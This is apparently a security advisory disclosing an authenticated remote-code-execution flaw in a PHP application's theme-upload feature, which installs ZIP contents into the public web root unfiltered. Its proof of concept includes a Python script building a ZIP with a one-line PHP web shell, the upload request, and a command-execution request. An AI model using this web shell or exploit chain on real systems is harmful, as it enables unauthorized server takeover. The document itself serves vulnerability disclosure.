GHSA-fw49-9xq4-gmx6

Summary

A theme upload feature allows any authenticated backend user with theme-upload permission to achieve remote code execution (RCE) by uploading a crafted ZIP file. PHP files inside the ZIP are installed into the web-accessible public/ directory with no extension or content filtering, making them directly executable via HTTP.

Details

File: modules/Theme/Controllers/Theme.php

After a ZIP is uploaded and extracted to a temporary directory, install_theme_from_tmp() is called unconditionally: Theme.php:51-52

File: modules/Theme/Helpers/themes_helper.php

The helper copies every file matching . from public/templates/<name>/ inside the ZIP directly into public/templates/<name>/ on disk using rename(), with no file-extension allowlist, no MIME check, and no content inspection: themes_helper.php:60-68

Because the web root is public/, any .php file placed there is directly reachable over HTTP.

PHP files are also installed — without filtering — into app/Controllers/templates/<name>/, app/Libraries/templates/<name>/, and other app/ subdirectories: themes_helper.php:31-42

The theme name is derived from the uploaded filename via str_replace('_theme.zip', '', $file->getName()), so uploading evil_theme.zip sets the theme name to evil and the install target to public/templates/evil/: Theme.php:20

PoC

Prerequisites: A backend account with theme upload permission (e.g., backend/themes/upload).

Step 1 — Build the malicious ZIP:

import zipfile, io  
  
buf = io.BytesIO()  
with zipfile.ZipFile(buf, 'w') as z:  
    z.writestr('public/templates/evil/shell.php', '<?php system($_GET["c"]); ?>')  
buf.seek(0)  
with open('evil_theme.zip', 'wb') as f:  
    f.write(buf.read())

Step 2 — Upload:

POST /backend/themes/upload  
Content-Type: multipart/form-data  
  
field name: theme  
file:       evil_theme.zip  

Step 3 — Execute:

GET https://target.com/templates/evil/shell.php?c=id  

Expected response: output of id...